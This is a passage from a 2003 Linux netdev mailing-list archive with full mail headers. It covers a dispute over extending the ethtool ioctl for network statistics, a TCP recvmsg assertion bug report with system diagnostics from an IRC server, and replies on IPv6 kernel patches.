else that cares can write programs just as clever. > What is this "other platform" issue? > > If you add anything new, along the lines of SIOCDEVETHTOOl, it's > going to have to go through an entire full review process and in > that review process any necessary 32-bit ioctl translation code > would get added. Yes, and since I am ignorant of that stuff, and have no hardware to test with, then I want to avoid it. I can't imagine I'm the only one. Overloading the ethtool ioctl is one way to avoid that pain..adding a new, similar ioctl would also work, but seems like duplicated effort to me. Since it seems very unlikly that this sort of patch will be accepted in the near future, how _DO_ you want to see new features added that require configuration (and reading) from user space? IOCTLs are easy to add on x86 at least, but maybe you'd prefer some text based proc interface instead? Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Wed Jul 23 00:36:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 00:37:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N7asFl011385 for ; Wed, 23 Jul 2003 00:36:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA08887; Wed, 23 Jul 2003 00:34:39 -0700 Date: Wed, 23 Jul 2003 00:34:39 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030723003439.684de751.davem@redhat.com> In-Reply-To: <3F1E391B.80209@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> <3F1E391B.80209@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4232 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 00:28:27 -0700 Ben Greear wrote: > In my case, if the net_device can return net_device_stats, then I want it to work. This is not for you to decide. That is the driver author's choice. Also, succeeding for _ANY_ ethtool command is going to give a tool the impression that other basic ethtool commands should work too. Your patch makes many devices give very inconsistent behavior. > Yes, and since I am ignorant of that stuff, and have no hardware to > test with, then I want to avoid it. I can't imagine I'm the > only one. Overloading the ethtool ioctl is one way to avoid that pain..adding > a new, similar ioctl would also work, but seems like duplicated > effort to me. The correct "fix" on the 2.4.x side is to add the appropriate ethtool support to appropriate drivers that lack it and need this interface. It is not your hack and it is not adding a new ioctl. You still haven't said why parsing /proc/dev is so bad, and you even admit that your tool has to fall back to this ANYWAYS. > Since it seems very unlikly that this sort of patch will be accepted > in the near future, how _DO_ you want to see new features added that > require configuration (and reading) from user space? I just showed you above how to fix this particular problem. Add ethtool support to the ethernet device in question, and submit this change to jgarzik. It isn't very hard work and things other than your particular need stand to gain from it. My final note: You don't even have the problem you claim to have. Use your brain and 'grep' a little bit, ok? :-) egrep get_stats net/core/rtnetlink.c There it is, exactly what you need and supported on every single kernel out there. From greearb@candelatech.com Wed Jul 23 01:08:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 01:09:08 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N88sFl014113 for ; Wed, 23 Jul 2003 01:08:55 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N88mm2000430; Wed, 23 Jul 2003 01:08:49 -0700 Message-ID: <3F1E4290.6020303@candelatech.com> Date: Wed, 23 Jul 2003 01:08:48 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> <3F1E391B.80209@candelatech.com> <20030723003439.684de751.davem@redhat.com> In-Reply-To: <20030723003439.684de751.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4233 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 00:28:27 -0700 > Ben Greear wrote: > > >>In my case, if the net_device can return net_device_stats, then I want it to work. > > > This is not for you to decide. That is the driver author's > choice. Is it their choice to participate in the /proc/net/dev output? I want the same info, only in binary format. However, this is a side issue: I am really looking for a flexible way to add new features through some ioctl interface, and these features will act primarily on struct net_device, ie at an abstract layer and independent of the underlying driver. > Also, succeeding for _ANY_ ethtool command is going to give > a tool the impression that other basic ethtool commands should > work too. Your patch makes many devices give very inconsistent > behavior. Only stupid tools...every use of ETHTOOL has to be checked because every driver implements different portions, or none at all. Inconsistent is when ethtool eth0 works when eth0 happens to be an 8139too driver and fails when eth0 is a tulip driver. > The correct "fix" on the 2.4.x side is to add the appropriate ethtool > support to appropriate drivers that lack it and need this interface. > It is not your hack and it is not adding a new ioctl. So, you'd accept an identical 30 line patch to *every* network device driver? And what about the ones that support no ethtool at all...would you accept the patch that only supported getting the binary stats? > You still haven't said why parsing /proc/dev is so bad, and you > even admit that your tool has to fall back to this ANYWAYS. I notice slowness when trying to probe 250 interfaces (vlans) very often. And no wonder, considering that to get up to date stats I need to read all of /proc/net/dev, search for the right line, and then parse it. Of course my tool will fall back: I want it to work everywhere...but that doesn't mean it shouldn't run better on newer kernels. > > My final note: You don't even have the problem you claim to have. > Use your brain and 'grep' a little bit, ok? :-) > > egrep get_stats net/core/rtnetlink.c > > There it is, exactly what you need and supported on > every single kernel out there. Yep, I looked through that..and through libnetlink, and the complexity is not worth it. Besides, I have multiple other things that are common to all ethernet and ethernet-like devices, so I need to either add IOCTLs, proc interfaces, or hack ethtool. I can continue to ship my own kernel and/or provide patches, but I would prefer to get the support into the mainline kernel. If you have ideas for how you'd like to see this done, plz tell. If you will never accept such a thing, then I'll ask again in 6 months and hope someone else answers. -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Wed Jul 23 01:18:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 01:18:18 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N8I9Fl015026 for ; Wed, 23 Jul 2003 01:18:11 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id BAA08970; Wed, 23 Jul 2003 01:15:51 -0700 Date: Wed, 23 Jul 2003 01:15:51 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030723011551.5663a020.davem@redhat.com> In-Reply-To: <3F1E4290.6020303@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> <3F1E391B.80209@candelatech.com> <20030723003439.684de751.davem@redhat.com> <3F1E4290.6020303@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4234 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 01:08:48 -0700 Ben Greear wrote: > Is it their choice to participate in the /proc/net/dev output? Precisely yes, this is why they have the option of not providing the ->get_stats() method by leaving it set to NULL. > > My final note: You don't even have the problem you claim to have. > > Use your brain and 'grep' a little bit, ok? :-) > > > > egrep get_stats net/core/rtnetlink.c > > > > There it is, exactly what you need and supported on > > every single kernel out there. > > Yep, I looked through that..and through libnetlink, and the complexity > is not worth it. Nice cop out. Netlink is the standard method to obtain information about network device, address, and route information. It is even defined by an RFC. We're not going to add a hack to the kernel just because you think netlink is too complex. If it's too complex, you get to live with the text based output. I'll tell you this, the netlink version will work on more systems, even ones that don't have /proc mounted. Your patch duplicates existing functionality (getting network statistics in binary form), so just based upon that I cannot allow your patch. From cedric.gavage@unixtech.be Wed Jul 23 02:24:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:24:32 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9OKFl023505 for ; Wed, 23 Jul 2003 02:24:21 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6N9OHZk014614; Wed, 23 Jul 2003 11:24:18 +0200 Message-ID: <3F1E53F7.5000803@unixtech.be> Date: Wed, 23 Jul 2003 11:23:03 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: Alan Cox , netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> In-Reply-To: <20030719191723.0821227f.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4235 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > >>>Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != >>>TCP_SYN_RECV) failed at tcp.c(2229) > > > This one was fixed in 2.4.21 > Still this with 2.4.21 kernel: (intel internet card, driver eepro100) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) Any idea? -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From davem@redhat.com Wed Jul 23 02:38:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:38:22 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9c1Fl024640 for ; Wed, 23 Jul 2003 02:38:01 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id CAA09160; Wed, 23 Jul 2003 02:35:29 -0700 Date: Wed, 23 Jul 2003 02:35:28 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030723023528.76b0f69c.davem@redhat.com> In-Reply-To: <3F1E53F7.5000803@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4236 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:23:03 +0200 Cedric Gavage wrote: > Still this with 2.4.21 kernel: (intel internet card, driver eepro100) > > Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE > Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) What interesting programs are you running on this system? Are you running and old version of vsftpd? From cedric.gavage@unixtech.be Wed Jul 23 02:45:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:45:41 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9jUFl026818 for ; Wed, 23 Jul 2003 02:45:31 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6N9jSZk016540; Wed, 23 Jul 2003 11:45:28 +0200 Message-ID: <3F1E58EE.5010109@unixtech.be> Date: Wed, 23 Jul 2003 11:44:14 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> In-Reply-To: <20030723023528.76b0f69c.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4237 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 11:23:03 +0200 > Cedric Gavage wrote: > > >>Still this with 2.4.21 kernel: (intel internet card, driver eepro100) >> >>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE >>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) > > > What interesting programs are you running on this system? > > Are you running and old version of vsftpd? > Thanks for your help... This server is efnet.skynet.be, ircd server connected on EFnet with ircd-hybrid-6.4... System is a Debian stable 3.0 aka woody (standard). Here is the "cat /proc/version" output Linux version 2.4.21-dell.poweredge.ppro.nosmp (root@localhost) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Sat Jul 19 16:13:28 CEST 2003 Here is the "cat /proc/cpu" output: fazer:/root# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 6 cpu MHz : 993.399 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1979.18 Here is the "cat /proc/meminfo" output: fazer:/root# cat /proc/meminfo total: used: free: shared: buffers: cached: Mem: 262762496 214491136 48271360 0 6619136 83787776 Swap: 995250176 1622016 993628160 MemTotal: 256604 kB MemFree: 47140 kB MemShared: 0 kB Buffers: 6464 kB Cached: 80888 kB SwapCached: 936 kB Active: 61152 kB Inactive: 122056 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 256604 kB LowFree: 47140 kB SwapTotal: 971924 kB SwapFree: 970340 kB Here is the "cat /proc/modules" output. fazer:/root# cat /proc/modules serial 44160 0 (autoclean) eepro100 18060 2 mii 2480 0 [eepro100] Here is the running process list. fazer:/root# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1272 436 ? S Jul22 0:06 init [2] root 2 0.0 0.0 0 0 ? SW Jul22 0:00 [keventd] root 3 0.0 0.0 0 0 ? SWN Jul22 0:00 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? SW Jul22 0:00 [kswapd] root 5 0.0 0.0 0 0 ? SW Jul22 0:00 [bdflush] root 6 0.0 0.0 0 0 ? SW Jul22 0:00 [kupdated] root 7 0.0 0.0 0 0 ? SW Jul22 0:00 [scsi_eh_0] root 8 0.0 0.0 0 0 ? SW Jul22 0:00 [scsi_eh_1] root 164 0.0 0.2 1340 556 ? S Jul22 1:39 /sbin/syslogd root 167 0.0 0.4 2012 1188 ? S Jul22 0:00 /sbin/klogd root 170 0.1 1.5 5340 4088 ? S Jul22 2:43 /usr/sbin/named root 187 0.0 0.1 1248 420 ? S Jul22 0:00 /usr/sbin/inetd root 190 0.0 0.3 5692 788 ? S Jul22 0:00 /usr/sbin/ippl root 192 0.0 0.3 5692 788 ? S Jul22 0:00 /usr/sbin/ippl nobody 193 0.0 0.3 5692 788 ? S Jul22 0:01 /usr/sbin/ippl nobody 194 1.3 0.3 5692 788 ? R Jul22 22:43 /usr/sbin/ippl ircd 197 0.6 33.8 111524 86980 ? S Jul22 10:53 /usr/local/ircd-hybrid/ircd smmsp 224 0.0 0.6 4988 1668 ? S Jul22 0:00 sendmail: MSP: Queue runner@00:10:0 root 228 0.0 0.8 3140 2100 ? S Jul22 0:15 /usr/sbin/snmpd -s -l /dev/null root 230 0.0 0.3 2016 860 ? S Jul22 0:00 /usr/sbin/snmptrapd -s root 236 0.0 0.3 2784 1016 ? S Jul22 0:00 /usr/sbin/sshd root 239 0.0 0.7 1976 1968 ? SL Jul22 0:00 /usr/sbin/ntpd daemon 242 0.0 0.2 1384 556 ? S Jul22 0:00 /usr/sbin/atd root 245 0.0 0.2 1652 680 ? S Jul22 0:00 /usr/sbin/cron root 248 0.0 0.1 1256 412 tty1 S Jul22 0:00 /sbin/getty 38400 tty1 root 249 0.0 0.1 1256 412 tty2 S Jul22 0:00 /sbin/getty 38400 tty2 root 250 0.0 0.1 1256 412 tty3 S Jul22 0:00 /sbin/getty 38400 tty3 root 251 0.0 0.1 1256 412 tty4 S Jul22 0:00 /sbin/getty 38400 tty4 root 252 0.0 0.1 1256 412 tty5 S Jul22 0:00 /sbin/getty 38400 tty5 root 253 0.0 0.1 1256 412 tty6 S Jul22 0:00 /sbin/getty 38400 tty6 root 254 0.0 1.3 8292 3356 ? S Jul22 0:00 /opt/tivoli/tsm/client/ba/bin/dsmc root 255 0.0 1.3 8292 3356 ? S Jul22 0:00 /opt/tivoli/tsm/client/ba/bin/dsmc root 256 0.0 1.3 8292 3356 ? S Jul22 0:00 /opt/tivoli/tsm/client/ba/bin/dsmc root 3366 0.0 0.6 5732 1708 ? S 11:37 0:00 /usr/sbin/sshd root 3368 0.0 0.5 2464 1332 pts/0 S 11:37 0:00 -bash root 3394 7.0 0.6 5732 1708 ? R 11:42 0:00 /usr/sbin/sshd root 3396 0.0 0.5 2456 1312 pts/1 S 11:42 0:00 -bash root 3413 0.0 0.6 3544 1568 pts/1 R 11:42 0:00 ps aux -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From davem@redhat.com Wed Jul 23 02:49:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:49:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9nGFl027325 for ; Wed, 23 Jul 2003 02:49:16 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id CAA09215; Wed, 23 Jul 2003 02:46:48 -0700 Date: Wed, 23 Jul 2003 02:46:48 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030723024648.2e4b6a62.davem@redhat.com> In-Reply-To: <3F1E58EE.5010109@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4238 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:44:14 +0200 Cedric Gavage wrote: > David S. Miller wrote: > > On Wed, 23 Jul 2003 11:23:03 +0200 > > Cedric Gavage wrote: > >>Still this with 2.4.21 kernel: (intel internet card, driver eepro100) > >> > >>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE > >>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) > > Are you running and old version of vsftpd? > > Thanks for your help... > > This server is efnet.skynet.be, ircd server connected on EFnet with > ircd-hybrid-6.4... Any chance you can try with the e100 driver instead of eepro100? From davem@redhat.com Wed Jul 23 03:05:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 03:06:08 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NA5nFl030882 for ; Wed, 23 Jul 2003 03:05:57 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id DAA09251; Wed, 23 Jul 2003 03:02:56 -0700 Date: Wed, 23 Jul 2003 03:02:56 -0700 From: "David S. Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: [PATCH] Prefix List against 2.4.21 Message-Id: <20030723030256.42e687b1.davem@redhat.com> In-Reply-To: References: <200307210155.FAA31320@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4239 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 16:52:24 -0700 (PDT) Krishna Kumar wrote: > The same patch against 2.4.21. I've applied both 2.5.x and 2.4.x patches. Thanks. On the 2.4.x side, Marcelo is only accepting bug fixes so this prefix list stuff will have to wait for 2.4.23-pre1 before going in. From davem@redhat.com Wed Jul 23 03:16:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 03:16:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NAGkFl032317 for ; Wed, 23 Jul 2003 03:16:49 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id DAA09282; Wed, 23 Jul 2003 03:13:51 -0700 Date: Wed, 23 Jul 2003 03:13:51 -0700 From: "David S. Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com, linux-net@vger.kernel.org, krkumar@us.ibm.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030723031351.4e9db07c.davem@redhat.com> In-Reply-To: References: <200307210155.FAA31320@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4240 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 14:50:21 -0700 (PDT) Krishna Kumar wrote: > I am using sizeof(struct xxx) or __u32, etc in the code, I guess you are > ok with that. This needs some fixes still. First thing, ipv6_devconf is not obtainable from user and has pointers in it which makes usage sloppy. So I would suggest the following: 1) Remove "void *sysctl;" from ipv6_devconf, move it into inet6_dev ie. "void *cnf_sysctl;" update all code users. 2) Move "struct ipv6_devconf" into some linux/*.h ipv6 header usable by users. Use an existing one if possible. Then make sure net/if_inet6.h includes this thing. 3) Change "int" members of struct "ipv6_devconf" to "s32". It's anal and unnecessary on any current platform, but some day with 128-bit computers it might make some difference. :-) Thanks. From cedric.gavage@unixtech.be Wed Jul 23 04:31:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 04:31:38 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NBVPFl012376 for ; Wed, 23 Jul 2003 04:31:26 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6NBVMZk026197; Wed, 23 Jul 2003 13:31:23 +0200 Message-ID: <3F1E71C1.8080302@unixtech.be> Date: Wed, 23 Jul 2003 13:30:09 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> In-Reply-To: <20030723024648.2e4b6a62.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4241 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 11:44:14 +0200 > Cedric Gavage wrote: > > >>David S. Miller wrote: >> >>>On Wed, 23 Jul 2003 11:23:03 +0200 >>>Cedric Gavage wrote: >>> >>>>Still this with 2.4.21 kernel: (intel internet card, driver eepro100) >>>> >>>>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE >>>>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) >>> >>>Are you running and old version of vsftpd? >> >>Thanks for your help... >> >>This server is 